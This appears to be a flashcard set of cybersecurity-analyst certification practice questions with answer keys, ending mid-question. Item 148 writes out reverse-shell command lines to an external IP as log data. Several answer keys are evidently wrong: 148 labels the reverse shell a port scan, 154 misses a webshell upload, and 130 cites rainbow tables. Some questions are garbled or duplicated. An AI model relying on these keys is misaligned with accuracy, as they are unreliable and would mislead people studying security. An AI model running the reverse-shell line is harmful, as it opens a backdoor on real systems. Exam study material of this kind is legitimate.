  1. An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.
b. The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server.
c. The license for the application has expired, and the failed login will continue to occur until a new license key is installed on the application.
d. A successful malware attack has provided someone access to the network, and the failed logins are attempts to gain privileged access to the application.

A

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.

106
Q
  1. A cybersecurity analyst is reviewing the results of a recent external vulnerability scan. Several DDoS vulnerabilities are identified for devices, including a GroupWise mail server and several wireless access points that have critical, high vulnerabilities. None of these devices are listed on the network or software inventory. Which of the following should the analyst perform NEXT?

a. Notify accounting of errors on the hardware and software inventories.
b. Check the firewall logs for suspicious activity.
c. Request a new scan with a different tool and compare the findings.
d. Block the GroupWise mail server at the firewall.

A

a. Notify accounting of errors on the hardware and software inventories.

107
Q
  1. ** A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process for a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Select TWO).

a. Breach of confidentiality and market risk can occur if the potential acquisition is leaked to the press.
b. The parent company is only going through this process to identify and steal the intellectual property of the smaller company.
c. The company being acquired has its own tools and process and will be resistant to integrating with the parent company.
d. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
e. The industry may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place.
f. The company being acquired may already be compromised, and this could pose a risk to the parent company’s assets.

A

a. Breach of confidentiality and market risk can occur if the potential acquisition is leaked to the press.
f. The company being acquired may already be compromised, and this could pose a risk to the parent company’s assets.

108
Q
  1. ** After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment?

a. Cross training
b. Succession planning
c. Automated reporting
d. Separation of duties

A

d. Separation of duties

109
Q
  1. A staff member reported that a laptop has degraded performance. The security analyst has investigated the issue and discovered that CPU utilization, memory utilization, and outbound network traffic are consuming the laptop’s resources. Which of the following is the BEST course of action to resolve the problem?

a. Identify and remove malicious processes.
b. Disable scheduled tasks.
c. Suspend virus scan.
d. Increase laptop memory.
e. Ensure the laptop OS is properly patched.

A

a. Identify and remove malicious processes.

110
Q
  1. Which of the following systems or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability? (Select TWO).

a. SSH daemons
b. Web servers
c. Modbus devices
d. TLS VPN services
e. IPSec VPN concentrators

A

b. Web servers

d. TLS VPN services

111
Q
  1. Which of the following organizations would have to immediately remediate embedded controller vulnerabilities?

a. Banking institutions
b. Public universities
c. Regulatory agencies
d. Hydroelectric facilities

A

d. Hydroelectric facilities

112
Q
  1. A security analyst is conducting traffic analysis following a potential web server breach. The analyst wants to investigate client-side server errors.
    Time   IP         Protocol  Status Code
    11:42  10.34.3.5  HTTP      500
    11:39  85.13.7.6  HTTP      200
    11:15  72.33.8.2  HTTP      401
    11:01  33.88.9.6  HTTP      102
    Which of the following lines of this query output should be investigated?

a. 1
b. 2
c. 3
d. 4

A

a. 1

113
Q
  1. Ransomware is identified on a company’s network that affects both Windows and Mac hosts. The command and control channel for encryption for this variant uses TCP ports from 11000 to 65000. The channel goes to good1.iholdbadkeys.com, which resolves to IP address 172.172.16.2. Which of the following is the MOST effective way to prevent any newly infected system from actually encrypting the data on connected network drives while causing the least disruption to normal Internet traffic?

a. Block all outbound traffic to web host good1.iholdbadkeys.com at the border gateway.
b. Block all outbound TCP connections to IP host address 172.172.16.2 at the border gateway.
c. Block all outbound traffic on TCP ports 11000 to 65000 at the border gateway.
d. Block all outbound traffic on TCP ports 11000 to 65000 to IP host address 172.172.15.2 at the border gateway.

A

a. Block all outbound traffic to web host good1.iholdbadkeys.com at the border gateway.

114
Q
  1. ** A security analyst has concluded that suspicious intermittent network activity is coming from one or more systems using random IP addresses and MAC addresses. The same IP or MAC address is not used twice. Which of the following is the BEST course of action to identify the source of the suspicious activity when it resumes?

a. Configure a dynamic sinkhole
b. Review the firewall logs
c. Trace down to the switchport
d. Review the network IDS logs

A

c. Trace down to the switchport

115
Q
  1. ** After reading about data breaches at a competing company, senior leaders in an organization have grown increasingly concerned about social engineering attacks. They want to increase awareness among staff regarding this threat but do not want to use traditional training methods because they regard these methods as ineffective. Leadership wants to focus particular attention on potential attackers’ use of reconnaissance techniques and information gathering attempts. Which of the following approaches would BEST meet the requirements?

a. Classroom training on the dangers of social media followed by a test and gift certificates for any employee getting a perfect score
b. Simulated phishing emails asking employees to reply to the email with their updated phone number and office location
c. A poster contest to raise awareness of PII and asking employees to provide examples of data breaches and consequences
d. USB drives randomly placed inside an organization that contains a pop-up warning to any users who plug the drive into their computer

A

b. Simulated phishing emails asking employees to reply to the email with their updated phone number and office location

116
Q
  1. A security analyst wants to confirm a finding from a penetration test report on the internal web server. To do so, the analyst logs into the web server using SSH to send the request locally. The report provides a link to https://hrserver.internal/1/etc/passwd, and the server IP address is 10.10.10.15. However, after several attempts, the analyst cannot get the file, despite trying to get it in different ways, as shown below.
    Request                                        Response
    https://hrserver.internal/../../etc/password   Host not found
    https://localhost/../../etc/password           file not found
    https://10.10.10.15/../../etc/password         file not found
    Which of the following would explain this problem? (Select TWO)

a. The web server uses SNI to check for a domain name
b. Requests can only be sent remotely to the webserver
c. There is no local name resolution for hrserver.internal
d. The password file is write protected
e. The web service has not started

A

a. The web server uses SNI to check for a domain name

b. Requests can only be sent remotely to the web server

117
Q
  1. ** Management has directed the IT department to reduce operating costs by implementing the virtualization of the server infrastructure. Shortly after the implementation of a new virtual web server, the hypervisor is compromised. Which of the following is the most likely cause of the compromised hypervisor?

a. The web server was virtualized using the incorrect storage pool.
b. The web server was not placed properly in the DMZ virtual network
c. The attacker was able to escape the VM server to the host shell
d. VM infrastructure allows direct access to the VM host unless a VM firewall is configured

A

c. The attacker was able to escape the VM server to the host shell

118
Q
  1. ** Ransomware is identified on a company’s network that affects both Windows and Mac hosts. The command and control channel for encryption for this variant uses TCP ports from 11000 to 65000. The channel goes to good1.iholdbadkeys.com, which resolves to IP address 172.172.16.2. Which of the following is the most effective way to prevent any newly infected systems from actually encrypting the data on connected network drives while causing the least disruption to normal Internet traffic?

a. Block all outbound traffic to web host good1.iholdbadkeys.com at the border gateway
b. Block all outbound TCP connections to IP host address 172.172.16.2 at the border gateway.
c. Block all outbound traffic on TCP ports 11000 to 65000 at the border gateway
d. Block all outbound traffic on TCP ports 11000 to 65000 to IP host address 172.172.16.2 at the border gateway

A

a. Block all outbound traffic to web host good1.iholdbadkeys.com at the border gateway

119
Q
  1. The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:
    Locky.js
    xerty.ini
    Xerty.lib
    Further analysis indicates that when the .zip file is opened, it installs a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?

a. Disable access to the company VPN
b. Move the file from the NAS to a cloud-based storage solution.
c. Set permissions on file shares to read-only
d. Add the URL included in the .js file to the company’s web proxy filter

A

d. Add the URL included in the .js file to the company’s web proxy filter

120
Q
  1. A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive the customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discovers that data from the database can be mined over the Internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

a. Configure the database to listen for incoming connections on the internal network
b. Change the database connection string and apply necessary patches
c. Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443
d. Deploy a web application firewall to protect the web application from attacks to the database

A

c. Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443

121
Q
  1. ** During which of the following NIST risk management framework steps would an information systems engineer identify security controls and tailor those controls to the system?

a. Categorize
b. Select
c. Implement
d. Assess

A

b. Select

122
Q
  1. ! A security analyst has been asked to scan a subnet. During the scan, the following output was generated:
    {root@scanbox-}# nmap 192.168.100.

    Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST
    Interesting ports on purple.company.net (192.168.100.214):
    Not shown: 1676 closed ports
    PORT    STATE SERVICE
    22/tcp  open  ssh
    80/tcp  open  http
    111/tcp open  rpcbind
    443/tcp open  ssl/http
    Nmap finished: 256 IP addresses (2 hosts up) scanned in 7.223 seconds
    Based on the output above, which of the following is most likely?

a. 192.168.100.214 is a secure FTP server
b. 192.168.100.214 is a web server
c. Both hosts are mail servers
d. 192.168.100.145 is a DNS server

A

b. 192.168.100.214 is a web server

123
Q
  1. ** A penetration test of the internal DNS service of a company is scheduled, and the security analyst uses the tcpdump udp port 53 -i eth0 command to get a packet capture from the DNS server that will be used to confirm any findings. During the daily report meeting, the penetration tester reports a zone transfer vulnerability using the dig - axfr command against the server. The analyst opens the packet capture from the day before, but there are no traces of the transfer. Which of the following is the MOST likely cause of this issue?

a. A false positive was reported by the penetration tester
b. The packet analyzer software does not support DNS protocol parsing
c. The zone transfer used a different protocol
d. The zone transfer happened before the packet capture started
e. The DNS zone transfers used a different port and were filtered out of the capture
f. Tcpdump does not support capturing DNS packets

A

e. The DNS zone transfers used a different port and were filtered out of the capture

124
Q
  1. A business unit has an important web server that is running an outdated software platform that is vulnerable to a highly publicized attack vector. Which of the following technologies may be able to provide protection for the web application against coding attack scripts until the server is replaced?

a. Web application firewall
b. Web proxy
c. HIPS
d. Anti-malware

A

a. Web application firewall

125
Q
  1. ** After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the user’s roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation?

a. Reconfigure Radius
b. Implement MFA
c. Upgrade to the latest TLS
d. Salt password hashes

A

b. Implement MFA

126
Q
  1. ** A vulnerability scan came back with critical findings for a Microsoft SharePoint server:
    Vulnerable software installed: Office 2007
    HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Installer/UserData/S-1-5-18/Products/000021096F0100000100000000F01FEC/InstallProperties – key exists.
    The Office component Microsoft Office Excel Services Web Front End Components is running an affected version: 12.0.6612.1000
    Which of the following actions should be taken?

a. Remove Microsoft Office from the server
b. Document the finding as an exception
c. Install a newer version of Microsoft Office on the server
d. Patch Microsoft office on the server

A

d. Patch Microsoft office on the server

127
Q
  1. An analyst was investigating an attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)

a. RBAC
b. LEAP
c. DAC
d. PEAP
e. MAC
f. SCAP
g. BCP

A

a. RBAC
c. DAC
e. MAC

128
Q
  1. ** An analyst was investigating an attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)

a. RBAC
b. LEAP
c. DAC
d. PEAP
e. MAC
f. SCAP
g. BCP

A

a. RBAC
c. DAC
e. MAC

129
Q
  1. A security analyst at a financial organization is implementing a vulnerability scanning program. Which of the following should be considered when creating the program? (Select TWO)

a. The endpoint security product should be set up to report on all scanning attempts
b. Regulatory requirements should be reviewed and built into the scanning methodology
c. Degradation of network functionality must be considered for scanning scheduling
d. Network access control should be set to allow vulnerability scanning traffic.
e. Difficulty of patching implementation should affect the outcome of the scanning result
f. Trend determination should dictate the scheduling and frequency of the scanning

A

b. Regulatory requirements should be reviewed and built into the scanning methodology
f. Trend determination should dictate the scheduling and frequency of the scanning

130
Q
  1. A company has implemented WPA2 with a 20-character minimum for the WiFi passphrase, changes the passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate?

a. Downgrade attacks
b. Rainbow tables
c. SSL pinning
d. Forced deauthentication

A

b. Rainbow tables

131
Q
  1. ** A computer at a company was used to commit a crime. The system was seized and removed for further analysis. Which of the following is the purpose of labeling cables and connections when seizing the computer system?

a. To capture the system configuration as it was at the time it was removed
b. To maintain the chain of custody
c. To block any communication with the computer system from attack
d. To document the model, manufacturer, and type of cables connected

A

a. To capture the system configuration as it was at the time it was removed

132
Q
  1. A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. This includes the external perimeter and the internal perimeter of the environment. During which of the following processes is this type of information normally gathered?

a. Timing
b. Scoping
c. Authorization
d. Enumeration

A

b. Scoping

133
Q
  1. A security analyst is assisting in the redesign of a network to make it secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

a. System isolation
b. Honeypot
c. Jump box
d. Mandatory access control

A

c. Jump box

134
Q
  1. A security architect is overseeing the implementation of a new human resources information system and must prevent sensitive data from being accessed by unauthorized users on the network. Which of the following security principles should be applied?

a. Enforce the principle of least privilege and disable privileged service accounts.
b. Isolate and interconnect subsystems in adherence with the principle of least privilege.
c. Use effective quality assurance techniques to divide and identify elevated access
d. Sanitize and separate data sent to other systems with privileged accounts.

A

a. Enforce the principle of least privilege and disable privileged service accounts

135
Q
  1. Which of the following systems or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability? (Select TWO)

a. SSH daemons
b. Web servers
c. Modbus devices
d. TLS VPN services
e. IPSec VPN concentrators

A

b. Web servers

d. TLS VPN services

136
Q
  1. A security analyst is in the process of remediating several high vulnerabilities identified in a recent assessment. The analyst is currently addressing issues identified on a critical database server and has just completed the upgrade of the database server to the latest security patch. After applying the patch, the analyst re-ran the vulnerability scan. Although the majority of the database application’s high vulnerabilities were remediated, several high vulnerabilities persist. Which of the following describes the BEST course of action for the analyst?

a. Review the vulnerabilities to determine if any pertain to configuration weaknesses
b. Apply patches to address vulnerabilities to the underlying operating system
c. Accept the residual risk and move on to the next set of systems and vulnerabilities
d. Review the host firewall configuration to ensure access to the database port is denied

A

a. Review the vulnerabilities to determine if any pertain to configuration weaknesses

137
Q
  1. A security analyst has discovered that an outbound SFTP process is occurring at the same time of day for the past several days. At the time this was discovered, large amounts of business-critical data were delivered. The authentication for this process occurred using a service account with proper credentials. The security analyst investigated the destination IP for this transfer and discovered that this new process is not documented in the change management log. Which of the following would be the BEST course of action for the analyst to take?

a. Investigate a potential incident
b. Verify user permission
c. Run a vulnerability scan
d. Verify SLA with cloud provider

A

a. Investigate a potential incident

138
Q
  1. A user received an invalid password error when trying to change the password. Which of the following policies could explain why the password is invalid?

a. Access control policy
b. Account management policy
c. Password policy
d. Data ownership

A

c. Password policy

139
Q
  1. Which of the following BEST describes why vulnerabilities in ICS and SCADA can be difficult to remediate?

a. ICS/SCADA systems are not supported by the CVE publications
b. ICS/SCADA systems rarely have full security functionality
c. ICS/SCADA systems do not allow remote connections
d. ICS/SCADA systems use encrypted traffic to communicate between devices

A

b. ICS/SCADA systems rarely have full security functionality

140
Q
  1. During the forensic phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation?

a. Session hijacking; network intrusion detection sensors
b. Cross-site scripting; increased encryption key size
c. Man-in-the-middle; well-controlled storage of private keys
d. Rootkit; controlled storage of public keys

A

c. Man-in-the-middle; well-controlled storage of private keys

141
Q
  1. A threat intelligence analyst who works for an oil and gas company has received the following email from a superior:
    “We will be connecting our IT network with our ICS in this scenario?”

a. Convergence decreases attack vectors.
b. Integration increases the attack surface
c. IT networks cannot be connected to ICS infrastructure
d. Combined networks decrease efficiency

A

b. Integration increases the attack surface

142
Q
  1. Several accounting department users are reporting unusual Internet traffic in the browsing history of their workstations after returning to work and logging in. The building security team informs the IT security team that the cleaning staff was caught using the systems after the accounting department users left for the day. Which of the following steps should the IT security team take to help prevent this from happening again? (Select TWO)

a. Install a web monitor application to track Internet usage after hours
b. Configure a policy for workstation account timeout at three minutes
c. Configure NAC to set time-based restrictions on the accounting group to normal business hours
d. Configure mandatory access controls to allow only accounting department users to access the workstations
e. Set up a camera to monitor the workstations for unauthorized use

A

c. Configure NAC to set time-based restrictions on the accounting group to normal business hours
e. Set up a camera to monitor the workstations for unauthorized use

143
Q
  1. A hacker issued a command and received the following response:
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    1543 filtered ?
    Device type: general purpose
    Os cpe: / o: linux_kernel: 2.5.6
    Read data files from /usr/local/bin/../share/nmap
    Which of the following describes what the hacker is attempting?

a. Penetrating the system
b. Performing a zombie scan
c. OS fingerprinting
d. Topology discovery

A

d. Topology discovery

144
Q
  1. Joe, a network administrator, receives an alert indicating a recently discovered vulnerability in PAM. Joe must quickly determine if there are any systems on the network that would be vulnerable. Which of the following should Joe use?

a. Nmap
b. Snort
c. Netstat
d. Dig

A

a. Nmap

145
Q
  1. Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation?

a. strings
b. sha1sum
c. file
d. dd
e. gzip

A

b. sha1sum

146
Q
  1. A system analyst receives multiple alerts from the systems, reporting they cannot access the Internet. After tracking down the problem to the UTM IP address 120.136.1.1, the analyst notices the issues occurred with the latest threat feed, which updated the UTM blocklist:
    IPv4 Blocklist Feed
    172.10.0.0/16
    23.221.15.0/24
    2.0.0.0/7
    192.0.0.0/24
    222.224.0.0/18
    11.255.255.0/24
    172.111.0.0/16
    120.0.0.0/5
    40.23.10.0/24
    Reviewing the above blocklist, which of the following is the MOST likely reason for the unwanted behavior on the UTM?

a. The threat feed contained a mistyped subnet mask in the list, causing the UTM to block its own internal traffic processing
b. The network’s public IP was entered as part of the external threat feed, causing the UTM to block only external-bound traffic
c. The network’s private internal address range was included in the feed, blocking internal traffic from leaving the network
d. The threat feed contained the IANA range reserved for the experimental IP address, which the UTM was unable to process, causing inbound and outbound traffic stoppage

A

a. The threat feed contained a mistyped subnet mask in the list, causing the UTM to block its own internal traffic processing

147
Q
  1. A security analyst is tasked with finding all external web hosts that are likely to be running plain text logon. The IP range is 109.120.0.33-62, and web servers are only listening on ports 80, 443, and 8080. Which of the following Nmap commands would return the desired result in the MOST concise way?

a. nmap -sS -Pn -p 80,8080 109.120.0.32/27
b. nmap -sS -Pn -p 80,443,8080 109.120.0.32/27
c. nmap -sS -Pn -p 80,8080 109.120.0.1-254
d. nmap -sS -Pn -F 109.120.0.32/27

A

b. nmap -sS -Pn -p 80,443,8080 109.120.0.32/27

148
Q
  1. While reviewing SIEM logs, an analyst finds several unusual entries in the user’s command history records:
    bash -i >& /dev/tcp/123.121.123.221/8080 0>&1
    bash -i >& /dev/tcp/123.121.123.221/80 0>&1
    bash -i >& /dev/tcp/123.121.123.221/25 0>&1
    bash -i >& /dev/tcp/123.121.123.221/22 0>&1
    bash -i >& /dev/tcp/123.121.123.221/443 0>&1
    Which of the following is most likely the FIRST objective of these commands?

a. Opening a reverse shell backdoor
b. Remote command execution on the targeted IP
c. SQL injection in the locally listening database
d. Manual port scan of IP addresses

A

d. Manual port scan of IP addresses

149
Q
  1. A company just deployed a new content management system as its main corporate blog site. The site normally runs well and was configured to update automatically. However, updates keep failing to install with a permission error. After contacting the CMS vendor, the security analyst is assured the web server’s service account must have write permissions for the ‘update’ directory.
    Web service account
    User=www-data
    Group=www-data
    drwxr-xr-x. www-data www-data system_u:object_r:httpd_sys_rw_content_t content
    drwxr-xr-x. www-data root     system_u:object_r:httpd_sys_rw_content_t themes
    drwxr-xr-x. www-data root     system_u:object_r:httpd_sys_rw_content_t update
    -rw-r--r--. www-data www-data system_u:object_r:httpd_sys_rw_content_t index.php
    -r--------. www-data root     system_u:object_r:httpd_sys_rw_content_t config.php
    -rw-r--r--. www-data root     system_u:object_r:httpd_sys_rw_content_t track.php
    -rw-r--r--. www-data www-data system_u:object_r:httpd_sys_rw_content_t post.php
    Given the result of the listing, which of the following should the security analyst do to BEST address the vendor’s instructions?

a. The analyst should give write permissions to the www-data group on the update directory
b. The analyst should give write permissions to the www-data user on the update directory
c. The analyst should change the ownership of all files and folders to the www-data group for the website
d. The analyst should enable write permissions on the MAC for the update directory

A

a. The analyst should give write permissions to the www-data group on the update directory

150
Q
  1. A tool discovered a suspicious hash on one of the company’s servers, and the hash was reported by the SIEM. A review indicates the hashed file is part of the build of a new version of the SCAP scanner, which the company is required to use. Which of the following has MOST likely occurred?

a. The SCAP scanner purposely incorporates an offending hash, which by design triggered the alert in the SIEM
b. The SCAP scanner has been compromised, which triggered the alert in the SIEM
c. The SIEM is incompatible with the SCAP scanner, which triggered a false positive in the SIEM
d. The SIEM has not been updated to recognize the new hash, which triggered the alert in the SIEM

A

a. The SCAP scanner purposely incorporates an offending hash, which by design triggered the alert in the SIEM

151
Q
  1. A security analyst is informed that employees from the human resources department should not have access to the accounting department server, and the accounting department should not have access to the human resources department server. Which of the following technologies should be used?

a. IDS
b. VLAN
c. DMZ
d. NAT
e. VPN

A

b. VLAN

152
Q
  1. A suite of three production servers that were originally configured identically underwent the same vulnerability scan. However, recent results revealed the three servers had different critical vulnerabilities. The servers are not accessible from the Internet, and AV programs have not detected any malware. The servers’ syslog files do not show any unusual traffic since they were installed, and the servers are physically isolated in an off-site datacenter. Checksum testing of random executables does not reveal tampering. Which of the following scenarios is MOST likely?

a. Servers have not been scanned with the latest vulnerability signature
b. Servers have been attacked by outsiders using zero-day vulnerabilities
c. Servers were made by different manufacturers
d. Servers have received different levels of attention during previous patch management events

A

d. Servers have received different levels of attention during previous patch management events

153
Q
  1. A large hospital is the recent target of a zero-day attack. The attack enabled payloads, which appear to be originating from multiple countries, to be dropped. The hospital’s information security department has deployed only endpoint antivirus software so far. The hospital wants to mitigate similar attacks in the future. Which of the following would be the best action to take NEXT?

a. Deploy perimeter firewalls to block the originating IP addresses of the recent attacks.
b. Integrate antivirus modules into all hospital routers with constant real-time updates.
c. Deploy FIPS compliant data-at-rest encryption to all hospital workstations and servers.
d. Deploy hash-based application whitelisting to all systems based on system baselines.

A

a. Deploy perimeter firewalls to block the originating IP addresses of the recent attacks.

154
Q
  1. An employee reports that a company website is displaying the wrong description when using a search engine. Upon further review of the web browser, there is no evidence that something is wrong. The security administrator reviews the web server logs and finds the following:
    14:49:10 -0500] "GET index.htm HTTP/1.0" 200 12 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
    14:50:09 -0500] "POST /wp-content/uploads/_input_test.php HTTP/1.1" 200 58926 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    14:50:10 -0500] "GET sales.htm HTTP/1.1" 200 58926 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    14:50:12 -0500] "GET /wp-content/uploads/_input_test.php HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
    14:52:10 -0500] "GET contactus.php HTTP/1.1" 200 58926 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    14:53:17 -0500] "POST /wp-content/uploads/_input_test.php5 HTTP/1.0" 404 11259 "-" "-"
    Which of the following describes the incident?

a. The website is incompatible between different versions of browsers
b. The search engine bot pulled the incorrect file for the description of the website
c. There are incorrect HTTP settings of the files to support the content management system
d. An unauthorized file has been transferred successfully to the web server

A

c. There are incorrect HTTP setting of the files to support the content management system

155
Q
  1. A system analyst is looking over a packet capture of a malware event in progress. Each request the malware makes is responded to by the malicious server, opening a new connection back to the infected workstation. Which of the following protocols is MOST likely being used?

a. HTTP
b. SSH
c. FTP
d. NFS

A

a. HTTP

156
Q
  1. The following vulnerabilities were discovered in a company’s standard-issue mobile devices:
    Vulnerability A: An information disclosure vulnerability in kernel components could enable a local malicious application to access data outside of its permission levels after first compromising a privileged process.
    Vulnerability B: LibUtils mishandles conversions between Unicode character encoding widths, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted file.
    Vulnerability C: An elevation of privilege vulnerability in the framework APIs that execute after a user interacts with an attack mechanism could allow a local malicious application to record audio without the user’s knowledge.
    Vulnerability D: server/content/SyncStorageEngine.java mismanages certain authority data, which allows attackers to cause a DoS (reboot loop) via a crafted application downloaded by the user.
    Which of the following should be considered the MOST serious?

a. Vulnerability A
b. Vulnerability B
c. Vulnerability C
d. Vulnerability D

A

d. Vulnerability D

157
Q
  1. A cybersecurity analyst detected that an attacker compromised a network and downloaded an executable. Through analysis, the analyst discovered the executable deleted all Linux server files and backups using the rm -rf command. Which of the following are the NEXT phases for handling this incident? (Select TWO)

a. Containment, eradication, and recovery
b. Detection and analysis
c. Eradication
d. Containment, recovery, and eradication
e. Post-incident
f. Post-analysis

A

a. Containment, eradication, and recovery

e. Post-incident

158
Q
  1. Which of the following are reasons why a technician would use Aircrack-ng? (Select TWO)

a. To capture some initialization vector data
b. To monitor for rogue wireless access points
c. To find hidden wireless network names
d. To inject fake access point power levels
e. To ensure users connect to the correct access point

A

b. To monitor for rogue wireless access points

c. To find hidden wireless network names

159
Q
  1. The company has decided to fund an enterprise content management system project. Management has decided it is time to move away from unstructured data residing on file servers. Staff members share information via attachments in emails and, in many cases, data has been sent to personal email addresses. Which of the following is the FIRST step to take in achieving a successful deployment of an enterprise content management system?

a. Conduct data classification
b. Establish structured data storage
c. Utilize data loss prevention tools
d. Implement an acceptable use policy

A

a. Conduct data classification

160
Q
  1. An outside audit is coming up for a company, and the security analyst is looking for areas of improvement that can eliminate any findings the auditors may make. The analyst is reviewing the account login report:
    Account analysis report prepared on 03/17/2017:
    SamAccountName LastLogTimeStamp
    Administrator 2/10/2017 2:23:43 AM
    xsimpson 2/11/2017 3:42:00 AM
    djwilson 2/15/2017 5:25:35 AM
    dwalton 4/13/2016 2:45:412 AM
    mwagner 2/12/2017 11:11:34 AM
    Zirvin 8/04/2016 8:01:22 AM
    Which of the following would be the BEST recommendation for the security analyst to prevent any audit findings?

a. Implement automatic provisioning of accounts
b. Implement deletion for old accounts
c. Implement blocking of off-hour logins
d. Implement an acceptable use policy

A

c. Implement blocking of off-hour logins

161
Q
  1. An organization has many deployed mobile devices in addition to its traditional workstations and servers attached to the corporate LAN. The security staff has a centralized vulnerability assessment tool that has been very effective for the traditional systems, but has an assessment results?

a. Configure the scanner to authenticate to and query the MDM using management APIs.
b. Ensure the scanning tools are loaded with the latest signatures for mobile malware
c. Require mobile devices to establish and maintain a full device VPN to the corporate network
d. Require mobile device users to download and install a personal vulnerability assessment app

A

a. Configure the scanner to authenticate to and query the MDM using management APIs.

162
Q
  1. A cybersecurity analyst is sanitizing multiple 7200rpm hard drives before reassigning them to different users to prevent data leaks. Which of the following commands will accomplish this task?

a. dd if=/dev/zero of=/dev/sdX
b. rm -rf /home/X/*
c. shred /home/X/*
d. find /home/X -type f -exec truncate -s0 {} \;

A

a. dd if=/dev/zero of=/dev/sdX

163
Q
  1. A software development company hired a programmer to develop a plug-in module for an existing application. After completing the module, the developer needs to test the entire application to ensure that the module did not introduce a new vulnerability. The developer thoroughly knows the module but has limited knowledge of the rest of the application. Which of the following is the developer performing when testing the application?

a. Black box testing
b. Gray box testing
c. White box testing
d. Design review testing

A

b. Gray box testing

164
Q
  1. A network security engineer is tasked with blocking all external connection attempts from the Internet to the /admin directory in a web application that uses TLSv1.2, but must continue to allow access to the rest of the site. Which of the following controls should the engineer apply to fulfill the requirement?

a. Add an IPS signature to block any session requesting resources from /admin.
b. Add a rule in the /admin webserver directory to deny from all.
c. Add a disallow: /admin entry to the robots.txt file in the webserver.
d. Add a firewall rule for Port 3 to allow connections from non-RFC-1918 addresses

A

a. Add an IPS signature to block any session requesting resources from /admin.

165
Q
  1. Following a security configuration assessment on a legacy server, a configuration check failed as follows:
    rsh: enabled (CCE-6418-8)
    Which of the following BEST describes the risks associated with this configuration?

a. No access controls exist.
b. It is a cleartext protocol.
c. The service generates excessive broadcasts.
d. This exposes the /etc/shadow file.

A

b. It is a cleartext protocol.

166
Q
  1. A cybersecurity analyst wants to check the Linux server at 10.10.10.11 after a hardening procedure was performed. The server is in a DMZ network isolated with a firewall from the Internet and the corporate network. Which of the following would be the MOST accurate way to know what services are listening on each port?

a. From a workstation, use nmap -p T:1-65535,U:1-65535 -sV 10.10.10.11
b. Use a sniffer at the Linux server at 10.10.10.11 to identify all communications.
c. Use the firewall logs and search for successful connections to and from Linux server.
d. Using elevated privileges, run the netstat -an | grep LISTEN command at the Linux server.

A

d. Using elevated privileges, run the netstat -an | grep LISTEN command at the Linux server.

167
Q
  1. A computer system’s CPU utilization has increased, the system freezes up often, and critical files are deleted or modified. These are symptoms of:

a. a virus
b. a worm
c. ransomware
d. spyware

A

a. a virus

168
Q
  1. A cybersecurity analyst is capturing an image of a machine that is possibly infected with malware. During which of the following incident response phases does this occur?

a. Eradication
b. Analysis
c. Recovery
d. Post-incident

A

b. Analysis

169
Q
  1. Which of the following frameworks focuses exclusively on security architecture?

a. NIST
b. ISO
c. ITIL
d. SABSA

A

d. SABSA

170
Q
  1. Credential harvesting is taking place at a company where employees have been falling victim to phishing emails. Which of the following should a security analyst implement to prevent successful authentication from this type of attack?

a. Increased password complexity.
b. User behavioral analytics.
c. CAPTCHA input box.
d. Multifactor authentication

A

d. Multifactor authentication

171
Q
  1. A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred?

a. The vulnerability scanner is unable to properly establish a connection to the server.
b. The scanner agent was improperly installed.
